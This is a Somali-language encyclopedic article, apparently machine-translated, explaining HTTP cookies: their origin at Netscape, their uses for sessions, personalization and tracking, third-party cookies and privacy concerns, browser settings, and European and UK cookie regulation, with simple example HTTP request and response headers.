in Qeexitaannada, -Leaks

Kukiyada Internetka: waa maxay? Qeexid, Asalka, Noocyada iyo Qarsoonaanta

Waa maxay doorka buskudka, waa maxay iyo waa maxay noocyada buskudka? đŸȘ

56.3k Views 384 Codadka

Kukiyada Internetka: waa maxay? Qeexid, Asalka, Noocyada iyo Qarsoonaanta
Kukiyada Internetka: waa maxay? Qeexid, Asalka, Noocyada iyo Qarsoonaanta

Un buskudka ama buskudka webka (ama buskud, oo loo soo gaabiyo markhaati Quebec) waxa lagu qeexaa hab-maamuuska xidhiidhka HTTP inuu yahay taxane xog ah oo server HTTP u diray macmiil HTTP ah, kaas oo kan dambe soo noqda mar kasta oo isla server HTTP la waydiiyo shuruudo gaar ah.

Buskugu wuxuu u dhigmaa a fayl yar oo qoraal ah oo ku kaydsan terminalka ee isticmaala internetka. Jiritaanka in ka badan 20 sano, waxay u oggolaanayaan horumarinta website-yada inay kaydiyaan xogta isticmaalaha si ay u fududeeyaan hagitaankooda oo ay u oggolaadaan hawlaha qaarkood. Kukiyada ayaa had iyo jeer ahaa mid ka badan ama ka yar muran sababtoo ah waxay ka kooban yihiin macluumaad shakhsi ah oo hadh ah oo laga yaabo inay ka faa'iidaystaan ​​​​daraf saddexaad.

Waxaa loo soo diraa madax HTTP ahaan server-ka webka browserka kaas oo ku soo celiya iyada oo aan isbeddelin mar kasta oo uu galo serverka. Buskudka ayaa loo isticmaali karaa xaqiijin, fadhi ( dayactirka gobolka), iyo loogu talagalay kaydi macluumaadka gaarka ah ee isticmaalaha, sida dookhyada goobta ama waxa ku jira gaadhiga wax iibsiga ee elegtarooniga ah. Erayga buskudka waxa laga soo qaatay buskudka sixirka, fikrad caan ah oo ku jirta xisaabinta UNIX, taas oo dhiirigelisay fikradda iyo magaca cookies browserka. Waxaa jira dhowr siyaabood oo lagu beddelan karo cookies, mid walbana wuxuu leeyahay isticmaalkiisa, faa'iidooyinka iyo khasaaraha.

Ahaanshaha faylasha qoraalka fudud, cookies-ka lama fulin karo. Iyagu maaha spyware iyo fayras midna, inkasta oo cookies-ka laga helo boggaga qaarkood ay ogaadaan software badan oo ka-hortagga fayraska sababtoo ah waxay u oggolaadaan isticmaalayaasha in lala socdo marka ay booqdaan goobo badan. 

Inta badan daalacashada casriga ah waxay u ogolaadaan isticmaalayaasha go'aanso inaad aqbasho ama diido cookies. Isticmaalayaasha sidoo kale dooro inta buskudku kaydsan yihiin. Si kastaba ha ahaatee, diidmada buuxda ee cookies-ka ayaa ka dhigaysa bogagga qaar mid aan la isticmaali karin. Tusaale ahaan, kaydi gawaarida wax iibsiga ama goobaha u baahan galitaanka adigoo isticmaalaya aqoonsiga (username iyo password).

Tusmada

taariikhiga ah

Ereyga cookie ka soo jeeda ereyga Ingiriisiga buskudka sixirka, kaas oo ah baakidh xog ah oo barnaamijku helo oo soo noqda isagoo aan isbeddelin. Kukiyada ayaa horey loogu isticmaalay IT marka Lou Montulli lahaa fikradda ah in iyaga loo isticmaalo isgaarsiinta webka Juun 1994. Wakhtigaas, waxa u shaqayn jiray Netscape Communications, kaas oo soo saaray codsiga e-commerce ee macmiilka. Kukiyada ayaa xal u helay dhibaatada isku halaynta ah ee hirgelinta gaadhiga wax iibsiga ee dukaanka.

John Giannandrea iyo Lou Montulli ayaa isla sanadkaas qoray qeexitaanka buskudka ee Netscape. Nooca 0.9 beta ee Mosaic Netscape, oo la sii daayay Oktoobar 13, 1994, isku dhafan farsamada buskudka (eeg boostada). Isticmaalka cookies-ka ugu horreeya (aan tijaabo ahayn) wuxuu ahaa in la go'aamiyo in booqdayaasha mareegta Netscape ay horay u soo booqdeen goobta. Montulli waxa uu xareeyay codsiga patentka ee tignoolajiyada buskudka 1995-tii, waxaana la siiyay shatiga US 5774670. la siiyay 1998kii.

Ka dib markii laga hirgaliyay Netscape 0.9 beta 1994kii, cookies ayaa lagu daray Internet Explorer 2, oo la sii daayay Oktoobar 1995.

Soo bandhigida buskudka wali si weyn looguma aqoon dadweynaha. Gaar ahaan, cookies-ka ayaa si caadi ah loo aqbalay goobaha browserka, iyo isticmaalayaasha looma ogaysiin joogitaankooda. Dadka qaarkiis waxay ka warqabeen jiritaanka cookies-ka rubuci hore ee 1995, laakiin dadweynaha guud ayaa kaliya qaatay jiritaankooda ka dib markii Financial Times ay daabacday maqaal Febraayo 12, 1996. Isla sanadkaas, cookies waxay heshay dareen badan oo warbaahin ah. sababtoo ah faragelinta qarsoodiga ah ee suurtogalka ah. Mawduuca cookies-ka waxaa looga hadlay laba la-tashi oo Guddiga Ganacsiga Federaalka Mareykanka ee 1996 iyo 1997.

Horumarinta qeexida buskudka rasmiga ah ayaa mar horeba socday. Wadahadalladii ugu horreeyay ee qeexidda rasmiga ah waxay dhaceen Abriil 1995 liiska boostada www-talk. Koox shaqo oo IETF gaar ah ayaa la sameeyay. Laba soo jeedin oo kale oo lagu soo bandhigayo gobolka macaamilka HTTP waxaa soo jeediyay Brian Behlendorf iyo David Kristol siday u kala horreeyaan, laakiin kooxda, oo uu hogaaminayo Kristol laftiisa, ayaa go'aansaday inay u isticmaalaan qeexitaanka Netscape barta bilawga ah. Bishii Febraayo 1996, kooxda shaqadu waxay go'aamisay in cookies-ka saddexaad ay khatar weyn ku yihiin sirta. Tilmaamaha ay kooxdu soo saartay ayaa ugu dambeyntii loo daabacay sida RFC 2109.

Laga bilaabo dhamaadka 2014, waxaan ku aragnaa banner ku saabsan cookies-ka goobo badan. Waxaa jira ugu yaraan hal kordhin browser ah oo u ogolaanaya banner lama soo bandhigin.

Noocyada Kukiyada iyo Isticmaalka

Maareynta fadhiga

Kukiyada waxaa loo isticmaali karaa in lagu ilaaliyo xogta isticmaalaha inta lagu jiro navigation, laakiin sidoo kale booqashooyin badan. Kukiyada waxaa loo soo bandhigay si ay u bixiyaan hab lagu hirgeliyo gawaarida wax iibsiga ee elegtarooniga ah, qalab wax ku ool ah kaas oo isticmaaluhu uu ku ururin karo alaabta uu rabo inuu iibsado marka uu daalacanayo goobta.

Maalmahan, apps sida gawaarida wax iibsiga beddelkeeda waxay ku kaydiyaan liiska shayada kaydka xogta ee server-ka, taas oo la door bidayo; intii lagu badbaadin lahaa buskudka laftiisa. Adeegaha shabakada waxa uu soo diraa buskud ka kooban aqoonsiga fadhiga gaarka ah. Barowsarku wuxuu markaa soo celinayaa aqoonsiga fadhiga codsi kasta oo soo socda oo shayada dambiisha waa la kaydiyay oo lala xidhiidhiyay aqoonsiga fadhiga gaarka ah.

Isticmaalka joogtada ah ee cookies-ka ayaa faa'iido u leh gelitaanka goobta adoo isticmaalaya aqoonsi. Marka la soo koobo, server-ka shabakadu waxa uu marka hore soo diraa buskud ka kooban aqoonsiga fadhiga gaarka ah. Kadib isticmaalayaashu waxay bixiyaan aqoonsigooda (badanaa magaca isticmaale iyo erayga sirta ah). Codsiga shabakada ayaa markaa xaqiijiya fadhiga oo u oggolaanaya isticmaalaha inuu galo adeegga.

shaqsinimo

Kukiyada waxaa loo isticmaali karaa in lagu xasuusto macluumaadka ku saabsan isticmaalaha goobta, si loo tuso waxyaabaha ku habboon mustaqbalka. Tusaale ahaan, server-ka shabakadu waxa uu soo diri karaa buskud uu ku jiro magaca isticmaalaha ugu dambeeya ee loo isticmaalo gelitaanka mareegahaas, si magaca isticmaalaha loogu sii daayo booqashooyinka mustaqbalka.

Shabakado badan ayaa u isticmaala cookies shakhsiyeynta iyadoo ku saleysan dookhyada isticmaalaha. Isticmaalayaashu waxay door bidaan doorashadooda qaab waxayna u gudbiyaan kuwan server-ka. Seerfarku waxa uu codeeyaa dookhyada ku jira buskudka oo dib ugu soo celiyaa browserka. Ka dib, mar kasta oo isticmaaluhu galo bogga boggan, browserku wuxuu soo celinayaa buskudka iyo sidaas darteed liiska dookhyada; Server-ku wuxuu markaas u habeyn karaa bogga si waafaqsan dookhyada isticmaaluhu. Tusaale ahaan, shabakada Wikipedia waxay u ogolaataa isticmaaleyaasheeda inay doortaan maqaarka goobta ay doorbidaan. Mashiinka raadinta Google wuxuu u oggolaanayaa isticmaaleyaasheeda (xitaa haddii aysan diiwaan gashanayn) inay doortaan tirada natiijooyinka ay rabaan inay ku arkaan bog kasta oo natiijooyin ah.

Dabagalka

Kukiyada raadraaca waxa loo isticmaalaa si loola socdo caadooyinka wax baadhista ee isticmaalayaasha intarneedka. Tan waxa kale oo lagu samayn karaa qayb ahaan iyada oo la isticmaalayo ciwaanka IP-ga ee kombayutarka oo samaynaya codsi bog ama adiga oo isticmaalaya cinwaanka HTTP 'referrer' kaas oo macmiilku ku soo diro codsi kasta, laakiin cookies-ka ayaa u oggolaanaya saxnaanta weyn. Tan waxaa la samayn karaa sida tusaalahan soo socda:

  1. Haddii isticmaaluhu u yeedho bog ku yaal goobta, oo codsigu aanu ku jirin buskud, adeeguhu waxa uu u qaadanayaa in kani yahay boggii ugu horreeyay ee uu booqdo isticmaaluhu. Server-ku wuxuu markaa abuuraa xadhig random ah wuxuuna u dirayaa browserka oo uu la socdo bogga la codsaday.
  2. Laga bilaabo wakhtigan, buskudka waxa si toos ah u soo diri doona browserka mar kasta oo la soo waco bog cusub oo goobta ah. Seerfarku wuxuu soo diri doonaa bogga sidii caadiga ahayd, laakiin wuxuu kaloo geli doonaa URL-ka bogga la yiraahdo, taariikhda, wakhtiga codsiga iyo buskudka ku jira faylka log.

Markaad eegto faylka log, waxaa markaa suurtagal ah in la arko boggaga isticmaaluhu booqday iyo siday u kala horreeyaan. Tusaale ahaan, haddii feylku ka kooban yahay dhawr codsi oo la sameeyay iyadoo la isticmaalayo kukiga id=abc, tani waxay xaqiijin kartaa in dhammaan codsiyadan ay ka yimaadeen isla isticmaale. URL-ka la codsaday, taariikhda iyo wakhtiga la xidhiidha codsiyada waxay ogolaadaan baadhista isticmaalaha in lala socdo.

Kukisyada qolo saddexaad iyo shumacyada shabakadda, hoos lagu sharraxay, ayaa sidoo kale awood u siinaya la socodka goobo kala duwan. Raadinta goobta kaliya ayaa guud ahaan loo isticmaalaa ujeedooyin tirakoob. Taas bedelkeeda, la socodka goobo kala duwan iyadoo la adeegsanayo cookies-ka saddexaad waxaa guud ahaan isticmaala shirkadaha xayaysiisyada si ay u soo saaraan profiles isticmaale oo qarsoodi ah (kuwaas oo markaa loo isticmaalo si loo go'aamiyo xayeysiisyada loo baahan yahay in la tuso isticmaalaha iyo sidoo kale in loo diro emails u dhigma xayeysiisyadan - SPAM ).

Dabagalka cookies-ka ayaa khatar u ah duulaanka sirta isticmaalaha laakiin si fudud ayaa loo tirtiri karaa. Inta badan daalacashada casriga ah waxaa ku jira ikhtiyaar ah in si toos ah loo tirtiro cookies-ka joogtada ah marka la xirayo arjiga.

Buskudka qolo saddexaad

Sawirrada iyo walxaha kale ee ku jira bogga shabakadda waxa laga yaabaa inay ku jiraan server-yada ka duwan kan bogga martigelinaya. Si loo muujiyo bogga, browserku wuxuu soo dejiyaa dhammaan walxahan. Inta badan mareegaha waxaa ku jira macluumaad laga helay ilo kala duwan. Tusaale ahaan, haddii aad ku qorto www.example.com biraawsarkaaga, inta badan waxa jiri doona walxo ama xayaysiisyo ku jira qayb ka mid ah bogga kuwaas oo ka yimid ilo kala duwan, tusaale ahaan domain ka duwan www. .example.com. Kukisyada xisbiga "Kow" waa cookies oo uu dejiyo bogga ku taxan barta ciwaanka browserka. Kukiyada kooxda saddexaad waxaa dejiya mid ka mid ah walxaha bogga ee ka yimid qayb kale.

Sida caadiga ah, daalacashada sida Mozilla Firefox, Microsoft Internet Explorer iyo Opera waxay aqbalaan cookies-ka dhinac saddexaad, laakiin isticmaalayaashu waxay bedeli karaan jaangooyooyinka dookhyada browserka si ay u xannibaan. Ma jirto khatar amni oo ka dhex jirta cookies-ka dhinac saddexaad oo awood u siinaya shaqeynta shabakadda, si kastaba ha ahaatee waxaa sidoo kale loo isticmaalaa in lagu dabagalo isticmaalayaasha. goob ilaa goob.

Aaladaha ay ka midka yihiin Ghostery ee diyaar u ah dhammaan daalacashada uu ku jiro Google Chrome waxay xannibi karaan is-weydaarsiga u dhexeeya dhinacyada saddexaad.

Hirgelinta

Is dhexgalka suurtogalka ah ee u dhexeeya biraawsarkaaga webka iyo server-ka martigelinaya bogga shabakadda. Seerfarku waxa uu buskud u soo diraa browser-ka browserkuna dib buu u soo celiyaa marka uu waco bog kale.
Is dhexgalka suurtogalka ah ee u dhexeeya biraawsarkaaga webka iyo server-ka martigelinaya bogga shabakadda. Seerfarku waxa uu buskud u soo diraa browser-ka browserkuna dib buu u soo celiyaa marka uu waco bog kale.

Kukiyadu waa qaybo yaryar oo xog ah oo uu server-ku u soo diro browserka. Barowsarku waxa uu dib ugu soo celiyaa iyaga oo aan waxba iska bedelin serferka,isaga oo soo bandhigaya xaalada (xusuusta dhacdooyinkii hore) ee macaamilka HTTP ee aan wadan. Kukis la'aanteed, dib u soo celin kasta oo bogga shabakadda ah ama qayb ka mid ah bogga shabakadda waa dhacdo go'doonsan, oo ka madax bannaan codsiyada kale ee loo soo jeediyay isla goobta. Marka lagu daro awood u yeelashada in lagu dejiyo server-ka, cookies sidoo kale waxaa lagu dejin karaa luqadaha qoraalka sida JavaScript, haddii uu taageero oo oggolaado browserka.

Qeexida buskudka rasmiga ah waxay soo jeedinaysaa in daalacayaashu ay awoodaan inay kaydiyaan oo dib u soo diraan tirada ugu yar ee cookies. Gaar ahaan, browser-ku waa inuu kaydiyaa ugu yaraan 300 cookies oo afar kilobytes ah midkiiba, iyo ugu yaraan 20 cookies hal server ama domain.

Sida ku cad qaybta 3.1 ee RFC 2965, Magacyada buskudka waa xaalad-aan dareen lahayn.

Buskugu wuxuu cayimi karaa taariikhda uu dhacayo, markaas buskudka waa la tirtiri doonaa taariikhdan. Haddii buskugu aanu cayimin taariikhda uu dhacayo, buskudka waa la tirtirayaa isla marka isticmaaluhu ka baxo biraawsarkiisa. Sidaa darteed, sheegida taariikhda dhicitaanku waa hab lagu sameeyo buskudku inuu ku noolaado kulamo badan. Sababtan awgeed, cookies leh taariikhda uu dhacayo ayaa la sheegay inay tahay joogto ah. Codsi tusaale ah: goobta tafaariiqda ayaa laga yaabaa inay isticmaasho cookies joogto ah si ay u duubto shayada ay isticmaalayaashu dhigeen gaadhigooda wax iibsiga (xaqiiqda, buskudku waxa laga yaabaa inay tixraacdo gelida lagu kaydiyay xogta goobta iibka, oo aan ku jirin kumbuyuutarkaaga) . Taas macnaheedu waa, haddii isticmaalayaashu ay ka tagaan biraawsarkooda iyaga oo aan wax iibsan oo ay ku soo noqdaan mar dambe, waxay awood u yeelan doonaan inay mar kale helaan alaabta gaariga. Haddii buskudyadani aysan sheegin taariikhda dhicitaanka, waxay dhacayaan marka browserka la xiro, macluumaadka ku jira dambiisha ayaa lumi doona.

Kukiyada waxa ay ku koobnaan kartaa qayb gaar ah, subdomain ama dariiqa serfarka abuuray.

Wareejinta boggaga internetka waxaa lagu sameeyaa iyada oo la adeegsanayo habka wareejinta HyperText (HTTP). Iyagoo iska indhatiraya cookies-ka, daalacayaashu waxay ka wacaan bog server-yada shabakadda iyagoo guud ahaan u soo diraya qoraal gaaban oo la yiraahdo Codsiga HTTP. Tusaale ahaan, si aad u gasho bogga www.example.org/index.html, daalacayaashu waxay ku xidhaan server-ka www.example.org waxayna soo diraan codsi sidan u eg:

GET /index.html HTTP/1.1 Martigeliyaha: www.example.org
Navigator→server

Seerfarku waxa uu kaga jawaabayaa in uu soo diro bogga la codsaday, oo uu ka horreeyo qoraal la mid ah, oo dhammaan la wacay Jawaabta HTTP. Xirmadan waxa laga yaabaa inay ka koobnaato khadadka faraysa browserka inuu kaydiyo cookies:

HTTP/1.1 200 OKContent-nooca: text/htmlSet-Cookie: name= value
(bogga HTML)
Navigator←server

Seerfarku waxa kaliya oo uu soo diraa khadka-Cookie-ga, haddii seerfarku doonayo in browserku kaydiyo buskudka. Set-Cookie waa codsi ku socda browser-ka si uu u kaydiyo magaca=xarunta qiimaha oo uu ku soo celiyo dhammaan codsiyada mustaqbalka serferka. Haddii browser-ku uu taageero cookies-ka iyo cookies-ka oo la oggolaaday ikhtiyaarrada browserka, buskudka ayaa lagu dari doonaa dhammaan codsiyada soo socda ee isla server-ka. Tusaale ahaan, browserku waxa uu wacaa bogga www.example.org/news.html isaga oo u diraya codsigan soo socda serverka www.example.org:

GET /news.html HTTP/1.1 Martigeliyaha: www.example.orgCookie: name=valueAccept: */*
Navigator→server

Tani waa codsi loogu talagalay bog kale oo ka yimid isla server-ka, wayna ka duwan tahay kan kore ee hore sababtoo ah waxay ka kooban tahay xarig uu hore u soo diray server-ka browserka. Mahadsanid tan macnaheedu waa, adeeguhu wuu ogyahay in codsigan uu ku xidhan yahay kii hore. Seerfarku wuxuu kaga jawaabaa isagoo soo diraya bogga la yiraahdo, iyo sidoo kale isagoo ku dara cookies kale.

Qiimaha buskudka waxa bedeli kara serferka isaga oo soo diraya khad cusub Set-Cookie: name=new_value oo ka jawaabaya bogga la yiraahdo. browserka ayaa markaas ku bedelaya qiimihii hore mid cusub.

Khadka Set-Cookie waxaa badanaa abuuray barnaamijka CGI ama luqad kale oo qoraal ah, ma aha server-ka HTTP. Serverka HTTP (tusaale: Apache) waxa kaliya oo uu u gudbin doonaa natiijada barnaamijka (dokumenti uu ka horeeyay madaxa oo ay ku jiraan cookies) browserka.

Kukiyada sidoo kale waxaa dejin kara JavaScript ama luqado kale oo la mid ah oo ku shaqeeya browserka, tusaale ahaan dhinaca macmiilka halkii ay ka ahaan lahaayeen dhinaca server-ka. JavaScript dhexdeeda, document.cookie shayga ayaa loo isticmaalay ujeedadan. Tusaale ahaan, dukumeentiga bayaanka

Tusaalaha jawaabta HTTP ee google.com, kaas oo dejinaya buskud leh astaamo.
Tusaalaha jawaabta HTTP ee google.com, kaas oo dejinaya buskud leh astaamo.

Marka lagu daro magaca/lammaanaha qiimaha, buskudku waxa kale oo uu ka koobnaan karaa taariikhda uu dhacayo, waddo, magac domain iyo nooca xidhiidhka loogu talagalay, sida caadiga ah ama sir ah. RFC 2965 waxa kale oo ay qeexaysaa in buskudku ay tahay inay lahaadaan nambarka nooca qasabka ah, laakiin tan guud ahaan waa la dhaafay. Qaybaha xogtani waxay raacaan magaca=lammaanaha_qiimaha cusub waxaana u kala baxa hal-koobyo. Tusaale ahaan, buskudka waxa samayn kara serferka isaga oo soo diraya khadka-kukiga: name=new_value; dhacayo=taariikhda; waddo=/; domain=.example.org

Kukiyadu way dhacayaan ka dibna uma diraan browserka serferka xaaladaha soo socda:

  • Marka browserku xiran yahay, haddii buskugu aanu sii soconayn.
  • Marka taariikhda dhicitaanka buskudka ay dhaaftay.
  • Marka taariikhda dhicitaanka buskudka la beddelo (Serfarka ama qoraalka) taariikh hore.
  • Marka browserku tirtiro buskudka marka uu codsado isticmaaluhu.

Xaaladda saddexaad waxay u oggolaanaysaa server-yada ama qoraallada inay si cad u tirtiraan buskudka. Ogsoonow in ay suurtagal tahay biraawsarkaaga Google Chrome si aad u ogaato taariikhda uu dhacayo buskudka gaarka ah adiga oo gelaya goobaha nuxurka. Buskudka ku kaydsan kombayutarka waxa laga yaabaa inuu si fiican halkaas ugu sii jiro dhawr iyo toban sano haddii aan la qaadin hab lagu tirtiro.

Aragtida qaldan

Tan iyo markii ay soo bandhigeen internetka, fikrado badan oo ku saabsan cookies-ka ayaa ku wareegay internetka iyo warbaahinta. Sannadkii 1998-kii, CIAC, kooxda la socodka shilalka kombuyuutarrada ee Waaxda Tamarta ee Maraykanka, waxay go'aamisay in baylahda amniga buskudka ay "run ahaantii aan jirin" waxayna sharaxday "macluumaad ku saabsan asalka booqashooyinkaaga iyo faahfaahinta boggaga internetka ee aad booqatay. mar horeba waxay ku jireen faylalka log-ka ee server-yada webka”. Sannadkii 2005, Jupiter Research ayaa daabacday natiijooyinka daraasaddan, taas oo boqolkiiba tiro badan oo ka mid ah jawaab-bixiyeyaasha ay tixgeliyeen odhaahyada soo socda:

  • Kukiyada waa sida virus, waxay waxyeeleeyaan isticmaalayaasha 'Hard Drive'.
  • Kukiyada ayaa dhaliya pop-up.
  • Kukiyada ayaa loo isticmaalaa in la diro spam.
  • Kukiyada waxaa loo isticmaalaa oo kaliya xayeysiinta.

Kukiyadu ma tirtiri karaan mana akhrin karaan macluumaadka kumbiyuutarka isticmaalaha. Si kastaba ha ahaatee, cookies-ka ayaa suurtogal ka dhigaya in la ogaado boggaga shabakadda ee uu booqday isticmaaluhu goob la bixiyay ama goobo la bixiyay. Macluumaadkan waxaa lagu soo ururin karaa astaanta isticmaalaha oo la isticmaali karo ama dib looga iibin karo qolo saddexaad, taasoo keeni karta arrimo sir ah oo halis ah. Qaar ka mid ah profiles waa qarsoodi, macnaha in aanay ku jirin macluumaad shakhsi ah, weli xitaa profiles noocan oo kale ah waxay noqon kartaa su'aal.

Sida laga soo xigtay isla daraasaddan, boqolkiiba tirada badan ee isticmaalayaasha internetka ma yaqaanaan sida loo tirtiro cookies. Mid ka mid ah sababaha ay dadku u aamini waayeen cookies waa in bogagga qaar ay si xun ugu xadgudbeen dhinaca aqoonsiga shakhsi ahaaneed ee cookies oo ay macluumaadkan la wadaagaan ilo kale. Boqolkiiba tirada badan ee xayaysiisyada la beegsaday iyo iimaylka aan la codsan, ee loo tixgaliyo spam, waxay ka yimaadaan macluumaadka laga soo ururiyay raadinta cookies.

Dejinta browserka

Inta badan daalacashada waxay taageeraan cookies waxayna u ogolaadaan isticmaaluhu inuu joojiyo. Doorashooyinka ugu caansan waa:

  • Awood ama dami kuukiiska gabi ahaanba, si si joogto ah loo aqbalo ama loo xannibo.
  • U oggolow isticmaaluhu inuu arko cookies-ka firfircoon ee bogga la bixiyay, adiga oo gelaya Javascript: alert(document.cookie) ee ciwaanka browserka. Barowsarrada qaarkood waxay ku daraan maamulaha buskudka isticmaalaha kaas oo arki kara oo dooran kara tirtirida cookies hadda uu kaydiyo biraawsarku.

Inta badan daalacashada waxay sidoo kale oggolaadaan in si buuxda loo tirtiro xogta shakhsi ahaaneed oo ay ku jiraan cookies. Qaybo dheeri ah oo lagu xakameynayo oggolaanshaha kukiyada ayaa waliba jira.

Qarsoodinimada iyo Kukiyada Qofka Saddexaad

Tusaalahan khiyaaliga ah, shirkad xayeysiis ah ayaa boodhadh ku dhejisay laba shabakadood. Adigoo ku martigelinaya boodhadhka server-keeda oo isticmaalaya cookies-ka qolo saddexaad, shirkadda xayaysiisku waxay awood u leedahay inay la socoto socodka isticmaalaha labadan goobood.

Kukiyada ayaa saameyn muhiim ah ku leh sirta iyo qarsoodiga isticmaalayaasha shabakada. Inkasta oo cookies-ka kaliya lagu celiyo server-ka iyaga dhigay ama server ka tirsan isla bogga internetka, bogga shabakadda si kastaba ha ahaatee waxaa laga yaabaa inuu ka koobnaado sawirro ama qaybo kale oo lagu kaydiyo server-yada ay leeyihiin xayndaabyada kale. Kukiyada lagu dhejiyay inta lagu jiro soo kabashada qaybahan dibadda ayaa loo yaqaan cookies dhinac saddexaad. Tan waxaa ku jira cookies-ka daaqadaha pop-up ee aan la rabin.

Shirkadaha xayeysiinta waxay isticmaalaan cookies-ka qolo saddexaad si ay ula socdaan isticmaalayaasha goobaha kala duwan ee ay booqdaan. Gaar ahaan, shirkadda xayaysiisku waxay la socon kartaa isticmaalaha dhammaan boggaga ay dhigtay sawirada xayaysiinta ama pixel tracking. Aqoonta boggaga uu booqday adeegsaduhu waxay u ogolaataa shirkadda xayeysiinta inay beegsato dookhyada xayeysiiska ee isticmaalaha.

Awoodda lagu dhisayo astaanta isticmaalaha waxa ay dadka qaar u arkaan duullaan sir ah, gaar ahaan marka dabagalka lagu sameeyo xayndaabyo kala duwan iyadoo la adeegsanayo cookies-ka qolo saddexaad. Sababtan awgeed, wadamada qaarkood waxay leeyihiin sharci kukiyada.

Dowladda Mareykanka ayaa sanadkii 2000 dhaqan galisay xeerar adag oo ku saabsan meeleynta cookies-ka, kadib markii la shaaciyay in Xafiiska Siyaasadda Maandooriyaha ee Aqalka Cad uu isticmaalayay cookies-ka si uu ula socdo kombuyuutarrada isticmaaleyaasha ee daawanaya xayeysiisyada daroogada ee internetka. Sannadkii 2002dii, Daniel Brandt oo u dhaqdhaqaaqa arrimaha gaarka ah ayaa ogaaday in CIA-du uga tagtay cookies-ka joogtada ah ee kombuyuutarrada booqday mareegaha internetka. Markii lagu wargeliyay jebintan, CIA waxay ku dhawaaqday in buskudyadan aan si ula kac ah loo dirin oo ay joojisay dejinta. Bishii Disembar 25, 2005, Brandt waxay ogaatay in Hay'adda Amniga Qaranka (NSA) ay uga tagtay laba cookies oo joogto ah kombiyuutarada booqdayaasha sababtoo ah cusbooneysiin software ah. Ka dib markii la ogeysiiyay, NSA waxay isla markiiba joojisay cookies.

Boqortooyada Ingiriiska, ayaa Sharciga kukiyada “, oo la dhaqan galiyay May 25, 2012, waxa ay ku waajibinaysaa goobaha in ay caddeeyaan waxa ay damacsan yihiin, si ay u ogolaato isticmaalayaasha in ay doortaan haddii ay rabaan in ay ka tagaan raadadka iyo in kale ee marinkooda internetka. Sidaas awgeed waxa laga ilaalin karaa beegsiga xayaysiiska. Si kastaba ha ahaatee, sida laga soo xigtay The Guardian-ka, Oggolaanshaha isticmaalayaasha Internetku maahan mid cad; isbedel ayaa lagu sameeyay shuruudaha oggolaanshaha isticmaalaha, samaynta sidaas ayaa looga jeedaa.

Awaamiirta 2002/58 ee sirta ah

Awaamiirta 202/58 sirta iyo isgaarsiinta elektiroonigga ah, waxay ka kooban tahay xeerar ku saabsan isticmaalka cookies-ka. Gaar ahaan, qodobka 5, farqadiisa 3aad ee dardaarankan wuxuu u baahan yahay in kaydinta xogta (sida cookies) ee kumbiyuutarka isticmaalaha la samayn karo oo keliya haddii:

  • isticmaalaha waxaa lagu wargelinayaa sida xogta loo isticmaalo;
  • isticmaalaha waxa la siinayaa ikhtiyaarka ah in uu diido hawlgalkan kaydinta. Si kastaba ha ahaatee, qodobkan ayaa sidoo kale sheegaya in kaydinta xogta sababo farsamo awgeed ay ka baxsan tahay sharcigan.

Sababo la xiriira fulinta laga bilaabo Oktoobar 2003, dardaaranka ayaa si kastaba ha ahaatee kaliya aad si qalad ah loo dhaqan galiyay sida lagu sheegay warbixin December 2004, kaas oo sidoo kale tilmaamay in qaar ka mid ah dalalka xubnaha ka ah (Slovakia, Latvia, Greece, Belgium iyo Luxembourg) ayan weli gudbin. dardaaranka sharciga gudaha.

Marka loo eego ra'yiga G29 ee 2010, dardaarankan, kaas oo si gaar ah shuruud uga dhigaya isticmaalka cookies-ka ee ujeedooyinka xayeysiinta dabeecadda, ogolaanshaha cad ee isticmaalaha internetka ayaa weli ah mid aad u liidata. Dhab ahaantii, goobaha intooda badani waxay u sameeyaan si aan u hoggaansamin amarka, iyaga oo xaddidaya "banner" fudud oo ku wargelinaya isticmaalka "cookies" iyada oo aan la siin macluumaadka isticmaalka, iyada oo aan la kala saarin "farsamo" cookies. Kukiyada "raadinta", ama in aan la siin dookh dhab ah isticmaalaha raba inuu ilaaliyo cookies-ka farsamada (sida cookies-ka maamulka gaariga) oo diido "raad-raaca" cookies Dhab ahaantii, goobo badan si sax ah uma shaqeeyaan haddii cookies-ka la diido, taas oo aan u hoggaansamin dardaaranka 2002/58 ama dardaaranka 95/46 (Ilaalinta xogta shakhsiyeed).

Dardaaranka 2009/136/CE

Walaxdan waxa lagu cusboonaysiiyay Dardaaranka 2009/136/EC ee ku taariikhaysan Noofambar 25, 2009 kaas oo dhigaya in "kaydinta macluumaadka, ama helitaanka macluumaadka hore loo kaydiyey, ee ku jira qalabka terminalka ee macmiilaha ama isticmaalaha waxaa loo ogol yahay oo keliya shardi ah in macaamiishu ama isticmaaluhu waxa uu bixiyay ogolaansho, ka dib markii uu helo, si waafaqsan Awaamiirta 95/46/EC, macluumaad cad oo dhamaystiran, oo u dhexeeya kuwa kale ee ujeedooyinka habaynta. Sidaa darteed dardaaranka cusub wuxuu xoojinayaa waajibaadka ka hor inta aan cookies-ka la saarin kombayutarka isticmaalaha internetka.

Tixgelinta hordhaca ah ee dardaaranka, sharci-yaqaanka Yurub wuxuu qeexayaa si kastaba ha ahaatee: "Halka farsamo ahaan suurtagal ah oo wax ku ool ah, iyada oo la raacayo qodobada ku habboon ee Dardaaranka 95/46/EC, oggolaanshaha isticmaaluhu ee la xidhiidha hab-socodka ayaa lagu sheegi karaa iyada oo loo marayo isticmaalka goobaha ku haboon browserka ama codsiga kale". Laakiin dhab ahaantii, ma jiro browser ilaa maanta ka dhigaysa in la kala saaro cookies-farsamada lagama maarmaanka ah kuwa ikhtiyaarka ah kuwaas oo ay tahay in loo daayo doorashada isticmaalaha.

Awaamiirtan cusub waxaa gudbiyay xildhibaanada Belgian bishii Luulyo 2012. Daraasad la sameeyay 2014 ayaa muujisay in xitaa xildhibaanadu ay ku dhibtoonayaan codsigooda caqabadaha dardaaranka.

P3P

Qeexitaanka P3P waxaa ka mid ah awoodda server-ku uu ku sheegi karo siyaasadda sirnimada, taas oo qeexaysa nooca macluumaadka uu ururiyo iyo ujeedada. Xeerarkan waxaa ka mid ah (laakiin aan ku xaddidnayn) isticmaalka macluumaadka la ururiyay iyadoo la isticmaalayo cookies. Marka loo eego qeexitaannada P3P, browserku wuxuu aqbali karaa ama diidi karaa cookies-ka isagoo isbarbar dhigaya siyaasadaha gaarka ah ee dookhyada isticmaalaha ama isagoo waydiinaya isticmaalaha, soo bandhigaya bayaanka sirta gaarka ah ee uu ku dhawaaqay adeeguhu.

